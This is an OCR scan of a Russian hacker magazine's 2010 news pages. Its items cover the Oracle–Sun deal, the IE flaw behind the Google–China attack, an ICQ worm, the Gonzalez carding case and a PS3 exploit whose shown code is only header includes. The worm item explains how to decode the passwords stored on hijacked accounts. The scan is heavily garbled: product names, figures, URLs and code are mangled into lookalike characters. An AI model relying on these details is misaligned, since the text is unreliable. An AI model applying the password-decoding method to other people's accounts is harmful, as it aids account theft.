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Месяц выдался богатым на разные истории , одна круче другой. Но выход нового паблик-сплоита под ІЕ по 
определению затмевает любые другие истории. Тем более, что и тут нашлось место для шпионов, Китая и даже 
(каким-то наркоманским образом) компании Ѳоодіе. Впрочем, сам этот шпионский замес - не самая значимая 
часть произошедшего. 

Нам стобой куда интереснее технические и практические аспекты бага, поразившего, с разным анамнезом, 
все последние версии ІЕ. Тут мы засылаем тебе целебный луч светлых знаний и полный карт-бланш на 
изучение новойошибки ІЕ. И помогут тебе в этом все 1 44 страницы отборного контента из нового X. 



Приятного чтения! 
ПІкІІ022, ГЛ. ред. ін: 

пікіІогІсРгеаІ.хакер.ги 
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МАРИЯ «МІРК!У_» НЕФЕДОВА МІРРІИгаКЕАІ.ХАКЕР.Ки 



МЕ6АЫЕ№ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



ВСЕ, НЕТУ БОЛЬШЕ 
ЗІЖ! 




Долгое, оченьдолгое время рассматривала Евро- 
комиссия материалы по сделке между компаниями 
Огасіе и Сип Місгозузіетз, неоднократно отклады- 
вая вынесение решения. Долго думали европейские 
антимонополисты, и многое им не нравилось, и даже 
тот факт, что западные коллеги уже давно дали добро, 
их не убеждал. Смущение чиновников понятно, ведь в 
случае поглощения«0раклом»компании5ипводном 
месте сойдутся практически полная монополия на 
Заѵа, серьезные Ьагсіѵѵаге- мощности, мощнейшая 
БД, укомплектованная опциями на все случаи жизни, 
ѴігТиаІВох, Зоіагіз ОС, Му5С11_ и многое- многое другое. 
Но вот, после 9 месяцев споров, решение, наконец, 
было вынесено и оно, о чудо, положительное — 

Евро ко мисс ия разрешила сделку стоимостью $7.4 
миллиарда! Каковы будут последствия этого слияния, 
какое влияние оно окажет на рынок и как распорядят- 
ся в Огасіе новыми возможностями, покажет самое 
ближайшее будущее. Первые весточки уже имеются. 
Перед сдачей номера представители компании Огасіе 
сообщили о своих намерениях прекратить развитие 
платформы для совместной разработки открытых 
проектов — Кепаі [ ѵѵѵѵѵѵ.кепаі.сопп і. Сервис был создан 
компанией 5ип в 2008 году и, получив немалую попу- 
лярность среди разработчиков открытых приложений 
на языке Оаѵа, теперь, вероятно, будет закрыт. В перс- 
пективе, правда, открытие нового проекта — удобного 
как для разработчиков Оаѵа, так и Огасіе, но сам тренд 
печален. Остается только набрать в браузере ЫТр:// 
зип.сот и. смахнув слезу, наблюдать, какстраничку 
автоматически переадресовывает на огасіе.сот . Вот 
и нет больше легендарной 5ип Місгозузіетз, одной из 
ключевых компаний в истории ІТ. 



ТИХИЙ И УМНЫЙ «РЕЗАК» ОТ 1.6 



Компания БС выпустила новый пишу- 
щий БѴБ-привод 6Н24 5ирег МиШ. «Ре- 
зак» с максимальной скоростью записи 
24х по радует с разу нес кольки ми приятными 
особенностями, первая из которых — 
технология тихого воспроизведения 
Зііепі Ріау. Благодаря Зііепі Ріау девайс 
работает бесшумно, не жертвуя при 
этом производительностью системы. 
ОН24 поставляет2.400 Кб данных в 
секунду, производя только 32 децибела 
звука; для сравнения — почти также 
тихо, какЗО децибелов фонового шума 
втипичной библиотеке. Это особенно 
важно, когда ОН24 используется для 
того, чтобы слушать музыку или смотреть 
кино. Вторая приятная особенность — 
уникальнаятехнология Затіезз Ріау, 
которая автоматически предотвращает 



остановку воспроизведения видео в 
случае обнаружения на диске физичес- 
ких дефектов, таких как царапины или 
отпечатки пальцев. Привод сам находит 
следующий неповрежденный фрагмент 
и перескакивает через ошибочные дан- 
ные или поврежденные области всего за 
секунду или даже меньше. Также привод 
поддержи ваеттехнологию ЗесигБізс, 
обеспечивающую максимальную защиту 
конфиденциальных данных, а фир- 
менная утилита Б6 ЮББ максимально 
упростит процессустановки девайса, 
и автоматически обновит информацию 
по рекомендованным скоростям записи 
через специализированный веб-сайт. 
Средняя цена на 6 Н 24 Зирег МиШ 
составляет 1 100 руб. 




СКОРОСТНЫЕ «ВИНТЫ» от щ 

Весьма достоверные слухи утверждают, что скоро нас ожидает пополнение в линейке 
скоростных накопителей на жестких магнитных дисках ѴеІосіПарІогот компании ѴѴезІегп 
Відііаі. Моделей, судя по всему, будет две; ориентированы они будут на интерфейс 5АТА 
6 Гбит/с, скорость вращения шпинделя составит 10.000 об/мин, а объем кэша — 64 Мб. 
Так как младшая модель будет построена на одной пластине, ее объем составитЗОО Гб; в 
свою очередь, вторая модель сможет похвастаться уже двумя пластинами и емкостью 600 
Гб. Предполагается, что старшая модель НББ будет стоить порядка $300. 

393 ТОРРЕНТ-ТРЕКЕРА БЫЛИ ЗАКРЫТЫ В 
2009 ГОДУ УСИЛИЯМИ АНТИПИРАТСКОЙ 
ОРГАНИЗАЦИИ ВРЕШ. 
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В МИРЕ ЗАНЯТО УЖЕ 
ПОЧТИ 90% АДРЕСОВ 
ИНТЕРНЕТ-ПРОТОКОЛА 
ІРѴ4. 



60061-Е ССОРИТСЯ 

Ооодіе совсем недавно был атакован хакерами, 
и, как утверждают представители компании, 
сделано это былоумышлено, хакбыл заказной, 
а следы его ведут в Китай. То есть, пока получа- 
ется, что китайские хакеры сначала взломали 
почтовые аккаунты своих, местных, правоза- 
щитников, используя для этого очередную дыр- 
ку в ІЕ6, а уже потом отправились крестовым 
походом на сам боодіе и сайты других компаний 
(Ѵабоо, Зутапіес, АбоЬе и т.д.) . Ребята из боодіе 
в своем блоге ( доодІеЫод.ЫодзроІ.сот ) выра- 
жают озабоченность цензурой поиска в Китае. А 
также желание обсуждать с властями Подне- 
бесной возможность полноценной выдачи 
поисковых результатов, угрожая вовсе закрыть 
свое представительство. И атака хакеров — 
причина пересмотра сего бизнеса в Китае? 

Или, может быть, за 4 года, стех пор, как был 
запущен Соодіе. сп, стало ясно, что соперни- 
чатьс Ваіби.сот бессмысленно? :) Междутем, 
сообщение о критических ошибках в сплоите 



С КИТАЕМ 

сильно всколыхнуло общественность. Подлил 
масла в огонь и тот факт, что Місгозоіі и вовсе 
сначала не собирался выпускать заплатку, 
собираясь исправить ошибку в ближайшем 
плановом обновлении. В результате, во Фран- 
ции и Пермании власти вообще рекомендовали 
гражданам отказаться от ненадежного браузе- 
ра. В Місгозоіі, глядя на серьезность ситуации, 
экстренно выпустили патч, устраняющий, в 
целом, восемьуязвимостей в разных версиях 
ІЕ и, в частности, затыкающий ту самую дырку, 
которой, каксчитается, воспользовались хит- 
рые китайцы. Все подробности новой бреши в 
ІЕ — в нашейтеме номера. Любопытно, что на 
фоне шумихи неупустили своего и компании 
Орега Зоііѵѵаге и Могіііа. Они заявили, что 
скандал между Соодіе и Китаем подогревает 
интерес ких продуктам — уобеих компаний 
наблюдается явный прирост популярности. На- 
пример, в Орега уверяют, что их объем трафика 
вырос на 40% за 4 дня. 



ОШТУ- ЭТО НЕ ПАРОЛЬ 



В компании Тѵѵіііег всерьез озаботились 
безопасностью пользователей. Раз уж 
юзеры сами не могут думать своей голо- 
вой, придется думать за них, — видимо, 
решили в Тѵѵіііег, и составили список из 
370 самых популярных слов и комбинаций, 
использующихся при создании аккаунта в 
Тѵѵіііег в качестве пароля. Попали в Ыаск- 
Іізі сплошные банальности вроде «пакеб», 
«зіиріб», «Іѵѵіііег», «зесгеі», «рогзсбе», 
«іеггагі» и даже «гиззіа». Получившийся 
на выходе список попросту запретили — 
теперь при попытке задать пароль вроде 
«123456» или «раззѵѵогб» система скажет 
вежливое «нет, так не пойдет» и предложит 
пользователю придумать что-нибудь пос- 



ложнее. Впрочем, русские дііщкт (слово 
«пароль» на латинской раскладке] и про- 
чие наши банальности система по-прежне- 
му не распознает. 

Ранее разработчики уже внедрили механизм 
сканирования на наличие вредоносных кодов 
на третьих сайтах, ссылки на которые дают 
пользователи в своих твитах. Тѵѵіііег ведет 
собственный «черный список» сайтов и доме- 
нов, блокируя твиты с ссылками на сайты, 
содержащие активные таіѵѵаге-код. Ведь 
излюбленный прием для сбора трафика — 
отправить яркий твит с ссылкой на страницу 
со свежим сплоитом, составив содержание 
так, чтобы сообщение попало в «Наиболее 
популярные темы». 





ГИБРИД ОТ ИШО 

Думаешь, ноутбуком-трансформером тебя уже не удивить? Тогда знакомь- 
ся — новинка отИепоѵо — ІбеаРаб 111 НуЬгіб, состоящий из полноценной 
док-станции и не менее полноценного планшетника. По сути, в «собран- 
ном» виде два эти девайса составляют полноценный ноутбук неплохой 
мощности. Порознь мы имеем интернет-планшет на чипсете Оиаісотт 
Зпарбгадоп, с флеш-диском на 16 Гб, 512 Мбоперативной памяти, 
диагональю 1 1 .6" (1366x768 пикселей) и поддержкой мультитач. А также 
док-станцию на базе I піеі Соге 2 Оио 114100 с тактовой частотой 1 .3 ГГц, 4 
Гб О ОРЗ и твердотельным накопителем до 128 Гб. Вто время какпланшет 
работает под ЗкуІідЫ Еіпих, док-станция оснащена ѴѴіпбоѵѵз 7. Віиеіооіб, 
30 и ѴѴіЕі поддерживаются обеими секциями устройства, а планшет 
также щеголяет веб-камерой на 1.3 Мп. Время автономной работы обоих 
устройств будетдостигать8часов. Продажи этой интересной и необычной 
штуки начнутся летом, и цена составит$999. 
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МеІаТгасІег 4 - 

программа для зарабатывания денег 



На сегодняшний день информационно- 
торговая платформа МеІаТгасІег 4 явля- 
ется одним из самых популярных 
и передовых инструментов для работы 
на финансовых рынках. Терминал 
позволяет торговать самыми разными 
финансовыми продуктами: валютами, 
контрактами на разницу (СРБ) на акции 
и фьючерсы с одного счета. 



• Воплощение концепции «все-в-одном» 

возможность анализировать динамику финансовых инструментов, 
совершать торговые операции, создавать и использовать программы 
автоматического трейдинга; 

• Простота в использовании 

русскоязычное меню, возможность работать, не устанавливая програм- 
му на компьютер, понятный и удобный интерфейс, возможность 
торговать прямо с графиков; 

• Соответствие последнему слову в ІТ-разработоках для финансового 
сектора 

ѴУАР, версия для КПК и смартфона; возможность работы через 
крупнейшую систему электронной торговли (ЕСЫ) Сиггепех; 

• Полноценная информационная поддержка клиентов 
круглосуточный пакет новостей оп-1іпе для клиентов от информационных 
агентств Бо\ѵ Лопез №\ѵ8\ѵіге8 и «Прайм-ТАСС». 



Компания «Альпари» 

Профессиональные услуги на финансовых рынках 

8 (800) 200-01-31 

Звонок по России бесплатный 

ѵ\плллла1рагі.ги 




аірагі 



МоскййккРуыовский переулок, д. 10; (495) 710-76-76. Санкт-Петербург: ул. Ефимова, д. 4А, Бизнес-Центр «МИР», офис 405; (812) 441-29-30, 
441-29-31. Ростов-на-Дону: пр. Соколова, д. 27, 4 этаж; (863) 250-21-29, 250-69-46. Новосибирск: ул. Советская, д. 37, офис 501; (383) 227-01-46. 
Екатеринбург: ул. Радищева, д. 12, офис 313; (343) 356-03-34, 378-20-38, 356-03-35. Нижний Новгород: ул. Ульянова 26/11, офис 1307; 
(831) 414-73-80, 411-82-67. Казань: ул. Спартаковская, д. 6, Бизнес-Центр «СУВАР ПЛАЗА», офис 1408; (843) 526-55-40- 
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РОССИЯ - ЛИДЕР ПО ОБЪЕМУ ТРАФИКА. ГЕНЕРИРУЕМОГО ВО ВРЕМЯ КИБЕРАТАК; 
1 3% ТРАФА НА НАШЕЙ СОВЕСТИ (ПО ДАННЫМ КОМПАНИИ АКАМАІ). 

ХАКЕРЫ «БЫВШИМИ» НЕ БЫВАЮТ 




Звезда мировой сцены Дмитрий 
Голубов ака ЗспрГ человек, при- 
ложивший руку к созданию ле- 
гендарного сайта сагсІегрІапеГ 
сс . названный западной прессой 
«крестным отцом кардерской 
мафии», ныне является главой 
интернет-партии Украины и 
вообще не любит, когда его на- 
зывают «хакером». В свое время 
5с гі рТ избежал «самого громкого 
разбирательства в истории 
Европы» (по мнению опять-таки 
западной прессы], благодаря 
тому, что за него поручились 
два народных депутата Украины 



Владимир Макеенко и Владимир 
Демехин. К политике Голубов 
не охладел по сей день, но и 
компьютерные хитрости ему все 
же не чужды: в ходе предвы- 
борной кампании, развернув- 
шейся вУкраине, Голубовувелу 
кандидата в президенты Юлии 
Тимошенко домен кгаіпа.ога. 
иа . где располагался ее проект 
«Ідеальну КраѴну». Именно 
этотадрес был опубликован на 
сотнях агитационных плакатов 
Тимошенко, именно по этому 
адресуона предлагала обра- 
щаться, призывая людей помочь 



ей в развитии Украины. Однако 
проплата домена истекла, и ин- 
тернет-партия быстро перекупи- 
ла имя, никакие нарушив закон. 
Голубов комментирует ситуацию 
в свойственной ему манере: 

«Она сожгла душу 1 5.000 людей, 
которые ежедневно тратили свое 
время и вносили свои предло- 
жения, в которых предлагали, 
как нужно строить государство. 

У сайта кгаіпа.огд.иа отличный 
РЕ и ТИЦ, этот сайт ежедневно 
посещает порядка 400-500 лю- 
дей, что позволит нам не тратить 
время на его раскрутку». 



СОГЛАСНО ДАННЫМ ЫШ РОШАТІОЙ, ЗА ПОСЛЕДНИЕ 5 ЛЕТ ВАКАНСИЙ ДЛЯ 
1.1Ш-СПЕЦИАЛИСТ0В СТАЛО БОЛЬШЕ НА 80 % 



ДОЛГОЖДАННЫЙ ГУГЛ0Ф0Н 



Девайс по имени Ыехиз Опе от компании Ооодіе, который 
сама компания относит к категории «суперфонов», поступил 
в продажу, и хотя никакой революции не случилось, устройст- 
во все равно достойно внимания. Аппаратвыполнен на 
базе устройства тайваньской корпорации НТО, и его дизайн 
выгодно отличается отТ -МоЬіІе Ѳ1 — у Ыехиз Опе определен- 
но есть свое «лицо». Что до технических характеристик, они 
выглядят следующим образом: дисплей 3.7" (АМОІ_ЕО, 480 х 
800), ксожалению, пока без мультитача — проблемы не с ре- 
ализацией, а с патентами; процессор Оііаісотт Зпарсігадоп 
30 0508250 1 ГГц; 512 Мб оперативной памяти, 512 Мбфлэш- 
памяти; карта памяти формата 50 объемом 4 Гб (максимум 32 
Гб); батарея, стандартная для такого рода гаджетов — 1400 
мАч. Девайс работает под АпбгоісІ 2.1 , поддерживает 05М/ 
ЕООЕ (850, 900, 1800, 1900 МГц], ѴѴІ-ЕІ (802.1 1 Ь/д/п), В1ие*оо*Ь 
2.1 и другие беспроводныетехнологии, а также комплекту- 
ется камерой на 5 Мп. Цифровой компас, акселерометр и 
А0Р5-приемник«в комплекте». Цена аппарата оказалась 
выше многих прогнозов — Ыехиз Опе без контракта стоит 
$529.99. Продажи для Европы начнутся весной и, кстати, 
в европейской версии мультитач, скорее всего, будет :]. 
Правда, зачем ждать? Знаменитый взлом щи к операционных 
систем семейства АпбгоісІ, известный под ником Суаподеп, 
выпустил обновление для прошивки смартфона Ыехиз Опе 
( ЬіІр:/Логит.хба-беѵе[орег5.сот/5боѵѵІ[ігеас1.рІір?1=621441 ]. 
которое кардинальным образом расширяетего функци- 
ональность, разблокируя мультитач. До этого хакер успел 
обновить прошивку с патченным ядром (іріаЫез, поддержка 
115В, обновленный драйвер для ѴѴЕАІЧ], 55Н (на базе демона 
ОгорЬеаг] и утилиты Ыапо, Ыюр, роѵѵеПор и ЬизуЬох. 
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В СПИСКАХ САМЫХ «БОЛЕЮЩИХ» КИБЕР- 
НЕДУГАМИ СТРАН РОССИЯ ЗАНЯЛА 2 МЕСТО 
-ТАКИЕ ДАННЫЕ ПРИВОДЯТСЯ В ЕЖЕГОДНОМ 
ОТЧЕТЕ РАШІ_АВ5 
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КОМПЬЮТЕР НАЧИНАЕТСЯ С ІІЧТЕІ* 
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Ищи знак 

ІпіеІ 

ІП5ІСІѲ 



сетевая инте грацияжноухбуки 
рабочие станции! периферия 



ІлТо-І или м подраздоленннн ня террятйрни США 



Корпорация ІпгеІ не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



© 2009 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпзісіе, логотип СепТгіпо, Соге ІПБІсіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзісіе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, ІпТеІ ѵРго, ІТапіит, ІТапіит ІПБІсіе, 
РепТіит, РепТіит ІпБІсіе, Ѵііѵ ІпБІсіе, ѵРго ІпБІсіе, Хеоп, и Хеоп ІпБІсіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории США и других стран. 
Все права защищены. Реклама. 
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ПОИСКОВАЯ МЗДА 

Правообладатели и их лобби — страшная сила, и эта сила бушуетв Европе 
вовсю. Стало известно, что власти Франции всерьез рассматривают воз- 
можность введения налога на использование поисковиков, то естьбоодіе, 
Віпд, ѴаЬоо, М5І\І, атакже на поискпо крупным социальным сетям. Средства, 
собранныета ким образом, планируют переправлять в фонды помощи пред- 
ставителя м творческих профессий, которые в наш суровый век страда ют от 
сетевого пиратства — писателям, художникам и, конечно же, самым бедным 
и несчастным — музыкантам. Платить этот налог, правда, должны будут не 
юзеры, а сами поисковые гиганты — правительство предполагает подать все 
это в виде налога на рекламу, то есть, вычитаться он будете каждого клика 
по рекламной ссылке или баннеру. Уже было подсчитано, что это теорети- 
ческое нововведение способно приносить Франции по 1 0-20 млн. евро в год. 
Представители Гугл-Европа уже высказались об этой инициативе француз- 
ских властей неодобрительно, заявив, что они «тормозят прогресс». Мы бы 
высказались иначе — власти опять пихают прогрессу в колеса арматуру, а 
также ищут деньги в чужом кармане. 



$1337 МОЖНО ПОЛУЧИТЬ ОТ 60061-Е, ОТЫСКАВ 
В СНРОМЕ СЕРЬЕЗНУЮ УЯЗВИМОСТЬ. 

СВОБОДУ пшшмммѵзои 

Пока 5ип и Огасіе радуются, совершая многомиллиардную сделку, таким положением вещей здо- 
рово недоволен один человек— Майкл Видениус, основной автор оригинальной версии МуЗОБ. 
Видениус до последнего призывал Еврокомиссию одуматься и защитить его детище, которое он, 
напомним, продал компании 5ип в ян варе 2008 года, а после активно принимал участие в проекте 
и заработал на продажах МуЗСіБ миллионы. Однако что-то пошло нетак, и в 2009 Видениус 
уволился из Зип, собираясь открыть собственный бизнес, но вместо этого, втом же 2009, начал 
холивар против Зип и Огасіе. Сейчас Майкл опасается, что сразу после слияния Огасіе сделает 
страшное — прекратит развитие его детища, практически убив МуЗОЕ, закроет код, поднимет 
цены на поддержку и так далее. Видениус даже основал сайт Ьеіртѵзді.ога . где собрал более 30 
тыс. подписей в защиту МуЗОЕ, но Еврокомиссия все же разрешила сделку. Посокрушавшись и 
дав очень нелестные комментарии в адресантимонополыщиков прессе, Видениус, однако, не 
сдался —теперь он просит помощи у России и Китая, каку «двух сильных, независимых стран, 
которые все еще могут изменить ситуацию». Он призывает обращаться в ФАС, писать о МуЗОИ 
в прессе и давить на все возможные рычаги. Опасения можно понять. Огасіе не поскупилась на 
рекламный блокв европейской редакции ѴѴаИЗігееІ Зоигпаі, пообещавтратить на разработку 
5РАРС и Зоіагіз больше денег, чемЗип.нопо поводу МуЗОЕ никаких обещаний и намеков не 
было. 



БИЛЛ ГЕЙТС ВЕРНУЛСЯ В СОЦИАЛЬНЫЕ СЕТИ 
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В прошлом у экс-главы МісгозоЕ уже был опыт 
общения ссоциальными сетями и, видимо, 
тогда они ему не слишком понравились. Еще в 
2007 году, когда «мелкомягкие» вложили $240 
млн. в ЕасеЬоок, почти одновременносэтим в 
сверхпопулярной сети появился аккаунт Билла 
Гейста, который, впрочем, просуществовал 
совсем недолго. Из-за нездорового ажиотажа и 
внимания, которое привлекал его профиль, Гейтс 
был вынужден покинуть ЕасеЬоокеще в феврале 
2008. Но прошло время и Билли, похоже, решил 



дать социальным сетям еще один шанс — он не 
только вернулся на ЕасеЬоок, но и создал учет- 
ную запись в ТѵѵіЕег БѵѵіЕег.сопп/ВіІІбаіез ). Пер- 
вый твит Гейтса, с которого он начал знакомство 
с сервисом, начался со сл о в « Н е Но ѴѴо гіеі » . В 
фоловеры к Биллу записалосьуже больше 380 
тыс. человек. В одном из последнихтвитов Билл 
рассказывает, что его фонд потратит 1 0 милли- 
ардов долларов на детские вакцины. Интересно, 
заработала ли в России МісгозоЕ столько денег 
за все 17 лет существования? 



► 010 
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Іпіеі, логотип ІпШІі Іпіеі ІпзііЛе, ІгПвІ Соге и Саге Іпзібе являются товарными знаками корпорации Іпіеі на территории США и других стран. 



ІЦюлмярт 

( 495 ) 287 - 42-41 ( 812 ) 334 - 99-39 
ѴѴѴѴѴѴ.Ш-МАНТ.РІІ 

Мощь и сила тигра в компьютерах 
Штагі™ Тідег Птііесі Есііііоп 
на базе процессора Іпіеі® Соге І7™ 






Корпорация ітеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



©2009 г, Сеіегоп, Сеіегоп Іпзібе, Сепіігіпо, СепНіпо ІпБібе, логотип Сепігіпо, Соге Іпзісіе, логотип Іпіеі, Іпіеі, Іпіеі Соге, Іпіеі Іпзібе, логотип Іпіеі Іпзібе, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, 
Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Ѵііѵ Іпзісіе, ѵРго Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации Іпіеі на территории 
США и других стран. Все права защищены. Реклама. 




МЕ6АЫЕѴѴ5 



СВИНОЙ ГРИПП ДОБРАЛСЯ 
ДО АСЬКИ 

Вирусы на глазах становятся хитрее, умнее и интерактивнее, и, пока 
полрунета, нахватавшись порно-заразы, воетотвирусов-шантажистов, 
требующихдля разблокировки ОС отправитьЭМЗ на короткий номер, 
другую половину порой даже сложно обвинять в глупости, фыркая 
«сами дураки». Яркий пример ксказанному — эпидемия, обрушивша- 
яся на I СО в конце января. Вирус Рідду.гір или Н1 N1 не просто угонял 
пароли и рассылал себя по всему конта кт- листу, но при этом еще вполне 
адекватно общался с подозрительными юзерами. На вопросы вроде 
«а там не вирус\троян?» вирус отвечал : «нет, это флешка про свинью, 
глянь :)», а на резонное «ты бот?» весьма бодро обзывал спрашиваю- 
щего в духе «сам ты бот!». В итоге, на провокацию попалисьтысячи лю- 
дей. Еще одна интересная черта Н 1 N 1 заключается втом, что, сменив в 
I СО пароль, хитрый малварь записывает новый пароль в зашифрован- 
ном виде прямо в графу«0 себе». 

Вирус имеет имя Рідду.ехе, размер 1 ,95 Мб (целый троя нище!]. Файл 
ничем не закриптован и написан на ОеІрЫ, что несложно выяснить с 
помощью РЕЮ. Посмотрев секцию данных, увидим, что все текстовые 
строки автор вируса закодировал неизвестным алгоритмом, который 
нам удалось быстро «расколоть». После длительныхтрассировок 
вируса в ОИуОЬд был найден адрес алгоритма декодирования тексто- 
вых строк— 004А60АС. Проанализировавучасток кода, поймешьи сам 
алгоритм :]. Вся строчка, состоящая из нолей и единичек, разбивается 
на блоки по 5 цифр (4 бинарных бита + бит-флаг]. Затем каждый подблок 
из4-х цифр преобразовывается из двоичной системы в десятичную и 
соединяется с результатом преобразования для предыдущего блока, а 
результат записывается в буфер. Эти действия повторяются до тех пор, 
пока флаг равен единице. Кактолько флагоказывался равен нулю, текст 
из буфера переводился в шестнадцатеричную систему — получается 
символ пароля. Допустим, была строчка: 0001 10001 1010100001 10001... 
Она разделилась на блоки: 0001 1 0001 1 0101 0 0001 1 0001 ... Далее 
каждый блок из 4-х чисел преобразовывался из двоичной системы в 
десятичную (0001 Ь => 1, 0001 Ь => 1 , 01 01 Ь => 5], причем полученные циф- 
ры записываются какодно число, а результат дал ее преобразовывается 
в шестнадцатеричную систему (1 1 56 = 736 = «в»]. 

Впрочем, для восстановления пароля возиться необязательно. Под- 
смотрев закодированный пароль на сайте ісд.сот/реоріе/номер уг- 
нанной аськи , составляем НТТР-запрос ЬирУ/иазс.огд.иа/Ріддѵ. 
рЬр?с=<нолики и единички> и получаем новый пароль. Скрипт для 
преобразования бесобег.рбрты найдешь на диске, его, как и описание 
вируса, подготовил еЕѵѵаих ( иазс.огд.иа і. Кслову, это не первый вирус, 
который умеет разговаривать по мессенджеру. Еще в 2005 году был 
замечен червь ІМ.Му5расе04.АІМ, который аналогично отшучивался 
в ответ на предположения о том, что он вирус («Іоі по ііз по! Из а ѵігиз», 
говорил он]. А в 2007 году прославился российский бот, который выма- 
нивал деньги с помощью разговоров о сексе. 




Вы инфицированы вирусом Ы1И1 



ГАЛЛЮЦИНОГЕННЫЙ 

ХАКИНГ 

15до25летлишениясвободы 
и огромный штраф, все еще 
продолжают выясняться новые 
подробности. Так, например, 
Гонсалес наконец признал себя 
виновным вхищении 170 млн. 
номеров кредитных и дебетовых 
карт, хотя исходно речь шла о 
130 миллионах. Также защит- 
ники хакера всячески упирают 
нато, что Гонсалес занимался 
киберкриминалом будучи не 
совсем в себе — утверждается, 
что он много лет употреблял ма- 
рихуану, Ю5 Ю , кетамин, кокаин 
и галлюциногенные грибы, и 
преступления совершал под 
влиянием перечисленных 
веществ. Психиатр, нанятый 
кардером, и вовсе поставил ему 
диагноз — синдром Аспергера, 
то есть высокофункциональный 
аутизм. Страшно подумать, 
что еще «найдут» у Гонсалеса, 
и какой вообще со всем этим 
выжил :]. 



Разбирательство по делу Аль- 
берта Гонсалеса ака зедѵес ака 
зоирпагі ака ]4д и а гі 7, самого 
«успешного» кардера в истории 
США, идет полным ходом. На- 
помним, что арестовали Гонса- 
леса еще в 2008 году, и тогда ему 
было предъявлено 19 обвине- 
ний, в числе которых и кибермо- 
шенничество и хищение личных 
данных при отягчающих обсто- 
ятельствах, и много еще чего. 
Сейчас, когда кардеру грозит от 




ИНТЕРНЕТ НА ОРБИТЕ 

В конце января у экипажа МКС появился повод для радости — 22 числа космонавты 
лично написали первый в истории человечества твитсорбиты и получили возможность 
прямого выхода в интернет. Раньше экипажтоже контактировал со всемирной паутиной, 
оставляя сообщения вТѵѵЮегили общаясьс близкими с помощью ІР-телефонии, но 
делать это приходилось через посредников, то естьчерез ЦУП вХьюстоне. Теперьже, 
благодаря Тимоти Кримеру, который больше месяца занимался на МКС этим вопросом, 
космонавтам для выхода в Сеть потребуется только ноутбук. Связь по-прежнему идет 
через Хьюстон, нотеперьееобеспечиваетспециальный сервер, подключенный квсе- 
мирной паутине. Интернет для экипажа МКС полностью открыт, но в ЦУПе напоминают, 
что космонавты такие же сотрудники НАСА, каки все остальные, и если они будут сидеть в 
интернете в ущерб работе, их ждут проблемы с начальством. 
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Ргвпі Ѵівѵі 



ПОЧТИ КАК ЖИВЫЕ 

Клавиатура и мышка ЕгдоМоііоп от компании ЗпгіагДізЬ 
Тесбпоіодіез лишний раз доказывают, что нет предела совер- 
шенству. Обе девайса изначально проектировались для меди- 
цинских. Главная особенность обоихустройств — подвижность. 
Клавиатура будет сама анализировать скорость печати и другие 
особенности работы пользователя и, исходя из этих наблюдений, 
сможет плавно подстраиваться под руки, снижая утомляемость и 
нагрузку. Киборд имеет7 позиций, может изменять угла наклона 
и взаимного расположения частей. Идеальным дополнением к 
этому привету из будущего является мышка, оснащенная плавно 
движущимся поворотным механизмом, с помощью которого 
«грызуна» можно наклонять практически какугодно. Оба девай- 
са подключаются к компьютеру через 115В. Продажи устройств 
начнутся весной, цена клавиатуры составит гуманные $1 50, цена 
мышки тоже не кусается — $50. 



81 99,5 МГЦ- ДО ТАКОЙ РЕКОРДНОЙ частоты удалось разогнать процессор 
ІОТЕІСЕІЕШ347(3,06ГГЦ)УКРАИНСКОМУОВЕРКЛОКЕРУт 

БЕСПРОВОДНЫЕ МОНИТОРЫ УЖЕ БЛИЗКО 

Это назревало давно, и вот, наконец, передача 
изображения без проводов почти добралась до 
потребительского рынка, замерев буквально в 
полушаге от начала продаж. Первую ласточку на 
волю отпустили компании I пТеІ и Ыеідеаг, проде- 
монстрировав на выставке СЕ5 2010технологию 
ІпіеІѴѴігеІезз Оізріау, передающую изображение 
разрешением до 720р посредством обыкно- 
венного ѴѴі-Рі. Для работы ІпіеІѴѴЮі не нужно ни- 
чего, кроме специального приемника и ноутбука 
(специально разработаны модели отЭопу, Оеіі 
и ТозЫЬа, работающие на базе I пТеІ Соге ІЗ, І5 и 
І7), который по нажатию хоткея подключается к 
удаленному экрану, выводя на него картинку. Как 
было сказано выше, изображение передается 
по стандарту 802.1 1 п, а сжатие картинки ложится 
на плечи процессора ноута, с которого идет 
передача. Да, картина пока неидеальна — 
нет поддержки НОСР (технологии защиты 
медиа контента), нетРиИ-НО, но все это обещают 
совсем скоро, равно каки более широкий 
перечень моделей ноутбуков, поддерживающих 
ѴѴЮі. В продаже это счастье должно появиться 
уже в конце января. 

ЗНАКОВАЯ ДАТА В ИСТОРИИ АМА20И: 25 ДЕКАБРЯ 2009 ВПЕРВЫЕ ЗА 
ВСЮ ИСТОРИЮ ПРОДАЖИ ЭЛЕКТРОННЫХ КНИГ ПРЕВЫСИЛИ ПРОДАЖИ КНИГ 
БУМАЖНЫХ. 
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МЕ6АЫЕѴѴ5 



ИССЛЕДОВАТЕЛЬСКАЯ КОМПАНИЯ ШСКАРТ СООБЩАЕТ. ЧТО НА 1 ДЕКАБРЯ 
2009 ГОДА В ИНТЕРНЕТЕ НАСЧИТЫВАЛОСЬ 233.848.493 САЙТОВ. 



ВЗЛОМ РЗЗ 
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// РЗЗ ехріоіг сосіе 
// с2010 деоЬоъ 

// I ІЮ N01 СОЫЕЮЫЕ РІВАСУ, ЕХРЬОІТ 15 ГОР РЕЗЕАРСН ИЗЕ ОИЬУ 



#іпс1ийе 

#іпс1шЗе 

#іпс1и<3е 

#іпс1шіе 

Фіпсіийе 



<1іпих/тосІи1е . Ь> 
<1іпих/кегпе1 .Ь> 
<1іпих/іпіъ . Ь> 
<1іпих/зузса11з .Ь> 
<1іпих/Гспт:1 .1і> 



Хакер ОеоНоі, известный своим неоценимым вкладом 
в ]аі!Ьгеак айфонов, не просто рассказал об успешном 
взломе Ріаувіаііоп 3, но и поделился со всеми рабочим 
сплоитом. Таким образом он желает подогреть сцену 
